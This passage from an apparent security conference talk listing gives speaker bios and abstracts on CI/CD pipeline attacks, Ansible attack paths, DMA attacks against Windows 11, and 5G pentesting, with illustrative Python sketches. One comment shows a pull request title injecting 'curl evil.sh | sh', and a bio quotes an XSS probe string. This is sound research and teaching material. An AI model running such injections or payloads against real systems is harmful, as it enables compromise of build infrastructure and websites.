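    fields = line.split()
    start, end = (int(x, 16) for x in fields[0].split("-"))
    return {
        "start": start,
        "end": end,
        "perms": fields[1],
        "path": fields[5] if len(fields) > 5 else "[anonymous]",
    }

def executable_regions(maps_text):
    regions = [parse_maps_line(l) for l in maps_text.splitlines() if l.strip()]
    return [r for r in regions if "x" in r["perms"]]

# On a live Linux process you would feed in open(f"/proc/{pid}/maps").read();
# here we use a hard-coded sample so the sketch is self-contained.
sample = (
    "559a1c400000-559a1c421000 r-xp 00021000 08:01 393228 /usr/bin/cat\n"
    "7ffd2b3a0000-7ffd2b3c1000 rw-p 00000000 00:00 0      [stack]\n"
)
for region in executable_regions(sample):
    print(hex(region["start"]), region["perms"], region["path"])
```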
Ron Bowes Principal Security Researcher, GreyNoise Intelligence
Ron Bowes is a Principal Security Researcher on the GreyNoise Labs team, which tracks and investigates unusual (typically malicious) internet traffic. His primary role is to understand and track the big vulnerabilities of the day/week/month/year; often, that means parsing vague vendor advisories, diffing patches, reconstructing attacks from log files, and (most complex of all) installing and configuring enterprise software. When he's not at work, he runs the BSides San Francisco Capture the Flag contest, is a founder of The Long Con conference in Winnipeg, takes improv classes, and continues his project to finish every game in his Steam library.
In 1865, Jules Verne sent men to the Moon from Florida. In 1969, Apollo 11 lifted off from Cape Canaveral. In 1984, William Gibson described cyberspace as a "consensual hallucination." Forty years later, we live in it. Science fiction is not prediction: it is a laboratory of ideas where the future is prototyped before it exists.
This talk offers a journey between imagination and innovation, between the pages of yesterday's novels and today's laboratories.
First, we will revisit some famous anticipations: the touchscreen tablets of Star Trek, the earpieces of Fahrenheit 451, the video surveillance of 1984, the self-driving cars of Total Recall.
Then we will dive into less publicized but more disruptive innovations. What can we draw from science fiction to guess what the near future holds, given today's breakthroughs in generative AI and quantum computing?
Finally, we will explore an even more radical territory: biomolecular computing. Researchers are now working on computing systems that feed on sugar and light. Data storage in molecules, biological computation, living interfaces: we stand at the dawn of a revolution whose scale few people grasp. Here too, what do the great imaginations tell us about these emerging subjects?
To conclude, we will combine these building blocks to imagine possible scenarios. Some already exist in science fiction literature. Others remain to be written. I hope you will leave wanting to identify the futures we desire and those we want to avoid.
Because thinking about the future is not an intellectual luxury. It is a responsibility. As technologists, researchers, hackers, and citizens, we have the power to steer the trajectory. Yesterday's science fiction is today's science. Today's science fiction will be our children's world.
The future is not predicted. It is chosen.
Xavier Facélina Executive Vice President, SECLAB
Xavier Facélina is the co-founder of SECLAB, a French company specializing in cybersecurity for critical infrastructure. Self-taught, he left school before finishing his baccalauréat to learn computing on his own and has never stopped since. Over 20 years, he has supported operators of vital importance in the energy, defense, and industrial sectors. He still owns a working Minitel. He prefers questions to answers and believes the best way to predict the future is to invent it.
This presentation will focus on AnsibleHound, a collector that adds Ansible WorX and Ansible Tower attack paths to BloodHound. Additionally, we will conduct a thorough exploration of Ansible exploitation and abuse through attack path management. This will enable both attackers and defenders to identify hybrid attack paths.
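To give a sense of what a collector like this produces, BloodHound-style tooling ultimately emits a graph of nodes and edges as JSON. The node and edge kinds below are invented stand-ins for illustration, not AnsibleHound's actual schema:

```python
import json

# Hypothetical sketch of BloodHound-style collector output: nodes for
# Ansible objects, edges for abusable relationships. All kind names here
# are made up for illustration purposes.

nodes = [
    {"id": "user-alice", "kind": "AnsibleUser", "name": "alice"},
    {"id": "jt-deploy", "kind": "AnsibleJobTemplate", "name": "deploy-prod"},
    {"id": "host-web01", "kind": "Computer", "name": "web01.corp.local"},
]

edges = [
    # alice can edit the job template -> she controls what it runs
    {"start": "user-alice", "end": "jt-deploy", "kind": "CanEditTemplate"},
    # the template executes with privileges on the managed host
    {"start": "jt-deploy", "end": "host-web01", "kind": "ExecutesOn"},
]

graph = {"graph": {"nodes": nodes, "edges": edges}}
print(json.dumps(graph, indent=2))
```

Chaining edges like these is what surfaces hybrid paths: an identity-tier foothold (the user) leading through automation (the job template) to infrastructure (the host).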
Our presentation will provide you with three key takeaways:
Charl-alexandre Le Brun Senior Penetration Tester, Desjardins
Charl-Alexandre is a dedicated member of the information security community. With several years of experience as a penetration tester, he is driven by a strong passion for developing innovative tools and techniques that advance the field and contribute to the broader community.
Simon Lachkar Offensive Team Lead, Desjardins Group
Simon leads the full-scope penetration testing team at Desjardins Group, one of Canada's largest financial institutions. Previously, he worked as a technical team leader and penetration tester in Canada and France. Simon has recently been involved in developing the AnsibleHound project.
For years, we wrote the defensive manuals. We built the "Living Off The Pipeline" (LOTP) inventory and released poutine to help you find the vulns. We even spoke at NorthSec about the theoretical risks of Build Pipeline compromise.
We have bad news: The Threat Actors were "in the room" taking notes.
In early 2025, we found the "smoking gun." A Threat Actor on BreachForums laid out the full attack plan for a 0-day compromise of a major Open Source project, giving a direct shout-out to our poutine scanner and LOTP research as the source. Our defensive work has become their offensive playbook.
In this talk, we stop playing defense.
Introducing SmokedMeat: The "Metasploit for CI/CD."
Our research team has a saying: 2025's Build Pipelines look like the average 2005 PHP Web App in terms of secure coding. They are wide open to "pwn requests" and command injections that lead to secrets exfiltration or privilege escalation via overprivileged tokens. SmokedMeat is the first Open Source Red Team framework designed to commoditize these compromises, demonstrating exactly what happens when a Threat Actor turns your infrastructure against you.
We will demonstrate a full exploitation chain: pivoting from unprivileged anonymous access on public repositories to private-repository access and intellectual property theft, the "gone in 60 seconds" jump from a workflow runner directly to permanent Cloud Admin, and the ability to escape ephemeral job contexts to implant permanent backdoors on your build infrastructure.
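The "pwn request" pattern behind these chains is usually an untrusted GitHub Actions expression interpolated straight into a `run:` shell script. A crude scanner for that smell might look like the following; this is a heuristic sketch in the spirit of what scanners like poutine check, not its actual implementation, and it only inspects single-line `run:` steps:

```python
import re

# Flag `${{ ... }}` expressions that expand attacker-controlled pull
# request fields directly inside a `run:` script: the classic GitHub
# Actions command injection ("pwn request"). Heuristic sketch only.

UNTRUSTED = re.compile(
    r"\$\{\{\s*github\.event\.(pull_request\.(title|body)|"
    r"issue\.title|comment\.body)\s*\}\}"
)

def find_injections(workflow_text):
    findings = []
    for lineno, line in enumerate(workflow_text.splitlines(), 1):
        # Simplification: only catches expressions on the same line as run:
        if "run:" in line and UNTRUSTED.search(line):
            findings.append((lineno, line.strip()))
    return findings

vulnerable = """\
on: pull_request_target
jobs:
  greet:
    runs-on: ubuntu-latest
    steps:
      - run: echo "Thanks for ${{ github.event.pull_request.title }}"
"""
for lineno, line in find_injections(vulnerable):
    print(f"line {lineno}: possible injection -> {line}")
```

A pull request titled `x"; curl evil.sh | sh; echo "` would execute arbitrary commands in that runner, and with `pull_request_target` the workflow runs with repository secrets in scope.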
The era of "awareness" is over. This talk is a live demonstration of why your current CI/CD security strategy is already obsolete.
This talk will expand on concepts explored in my NSEC 2025 talk, "Stolen Laptops: A brief overview of modern physical access attacks."
We will deep-dive into the subject of Direct Memory Access attacks against modern Windows operating systems, exploring together some of the primary countermeasures employed to protect computers from physical attackers.
Notably, we will discuss the implementation and interaction of various defensive technologies at the physical, firmware, and operating system layers.
This includes things like UEFI security, hardware whitelisting, firmware DMA protection and virtualization features (VT-d, VT-x, AMD-Vi), and their interaction with critical OS layer protection mechanisms including Virtualization-Based Security (VBS) and Kernel DMA Protection. We will discuss techniques used by attackers to neutralize or bypass these mechanisms to enable a DMA attack against Windows 11.
The talk culminates with an in-depth presentation of a novel tool I developed called DMAReaper. The tool allows attackers with physical access to disable Kernel DMA Protection via a pre-boot DMA attack, even when a system has all modern protection mechanisms enforced.
We will discuss the research that supported the tool's creation and the precise operations performed against system RAM in order to locate and destroy the DMAR ACPI table required for Kernel DMA Protection to function. This talk includes multiple video demonstrations of the tool being used to compromise a modern workstation running Windows 11.
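To make the DMAR-hunting step concrete: every ACPI System Description Table starts with a standard header (4-byte signature, 4-byte little-endian length, and a checksum byte chosen so all bytes of the table sum to zero mod 256). A sketch of locating the table in a RAM image follows; this illustrates the general scanning idea only, not DMAReaper itself:

```python
import struct

# Scan a memory image for the ACPI DMAR table. An ACPI SDT header is:
#   bytes 0-3  signature ("DMAR")
#   bytes 4-7  table length, little-endian
#   byte  8    checksum (all `length` bytes must sum to 0 mod 256)
# A tool that corrupts this table keeps the OS from programming the
# IOMMU, defeating Kernel DMA Protection. Sketch for illustration only.

def find_dmar(image):
    offset = image.find(b"DMAR")
    while offset != -1:
        if offset + 9 <= len(image):
            length = struct.unpack_from("<I", image, offset + 4)[0]
            table = image[offset:offset + length]
            # Validate via the checksum to reject false-positive matches.
            if len(table) == length and sum(table) % 256 == 0:
                return (offset, length)
        offset = image.find(b"DMAR", offset + 1)
    return None

# Synthetic image containing a fake-but-correctly-checksummed table.
table = bytearray(48)
table[0:4] = b"DMAR"
table[4:8] = struct.pack("<I", 48)
table[8] = (-sum(table)) % 256          # fix up the checksum byte
image = bytes(16) + bytes(table) + bytes(16)

print("DMAR found at:", find_dmar(image))
```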
Pierre-Nicolas Allard-Coutu Senior Penetration Tester, Bell Canada
Pierre-Nicolas Allard-Coutu is a senior penetration tester and offensive security R&D lead at Bell Canada's Security Testing and Incident Response team (STIRT). He is a seasoned red team operator with many years of experience specialized in the development of malware payloads and payload delivery systems. More recently, he has spearheaded the creation of physical penetration test methodologies including novel exploitation techniques aimed at compromising UEFI pre-boot environments and enabling Direct Memory Access vectors against modern laptops. He is currently the top public contributor to the Quebec Government Cyber Defense Center's vulnerability disclosure program, and part of the HackFest Challenge design team. The type of person who could never resist placing "><script>alert(1);<!-- in his bio.
5G networks are being opened up at every layer and attackers are paying attention. On the radio interface, we assess what operators actually deploy: is encryption enabled? Is integrity protection enforced on signaling and user plane? Are null ciphers still accepted? How well is the network isolated from external access? These fundamentals still fail more often than you'd think.
The 5G core runs on cloud-native, REST-based architectures where a single misconfigured network function can expose subscriber data or provide persistence into critical infrastructure. We demonstrate this live using our open-source 5GC API Pentest Burp Suite extension, automating NF discovery, IMSI enumeration, credential extraction, and API fuzzing against a 5G core. OpenRAN disaggregates the radio access network into open interfaces between O-RU, O-DU, O-CU, and the RIC, creating attack surfaces that didn't exist in monolithic base stations. And now CAMARA, the industry initiative exposing network capabilities through standardized APIs, gives third parties access to device location, SIM swap, and number verification, with security models still maturing.
This talk walks through real assessments and attacks at each layer, from verifying radio protections to exploiting core APIs, and examines how some endpoints could enable surveillance and fraud.
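For a flavor of the core-side attack surface: 5G network functions discover each other through the NRF's standardized REST API (3GPP TS 29.510, Nnrf_NFDiscovery). Probing it from an assessment host starts with requests like the one below; the endpoint path and query parameters come from the spec, while the NRF host is a placeholder for a lab deployment:

```python
from urllib.parse import urlencode
from urllib.request import Request

# Build an NRF discovery request (3GPP TS 29.510). A misconfigured core
# that exposes this endpoint without authentication will enumerate its
# network functions for anyone who asks.

NRF = "https://nrf.lab.example:8443"   # assumed lab NRF, not a real host

def discovery_request(target_nf, requester_nf="AMF"):
    query = urlencode({
        "target-nf-type": target_nf,        # e.g. UDM holds subscriber data
        "requester-nf-type": requester_nf,  # the NF type we claim to be
    })
    url = f"{NRF}/nnrf-disc/v1/nf-instances?{query}"
    return Request(url, headers={"Accept": "application/json"})

req = discovery_request("UDM")
print(req.get_method(), req.full_url)
# A pentest extension would send this and walk the returned NF profiles
# (IP addresses, service endpoints) to pick its next target.
```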
Sébastien Dudek is the founder of Penthertz, a French company specializing in wireless and hardware security. With over 15 years of experience in telecommunications security, he has published research on 5G security, Open RAN, baseband fuzzing, mobile network interception, and power-line communication vulnerabilities. He is the creator of RF Swift, an open-source SDR toolkit, V2G Injector/HomeplugPWN, 5GC API Pentest, and LoRa Craft among other security tools.
His clients include major defense, (aero)space, and automotive companies, and his work spans 2G through 5G security, OT/IoT device security, and critical infrastructure protection.